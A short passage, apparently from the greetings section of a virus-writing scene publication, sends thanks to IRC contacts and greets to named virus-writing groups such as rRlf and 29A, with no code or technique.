IRC (unfortunatly we have nearly no contact recently) and many other cool individuals I know... :)I also want to send out some group greets: Greets to rRlf (of course :D), 29A,iKx, SLAM, TKT,MIONS, Whackerz and every other more or less activ virus-writing-group!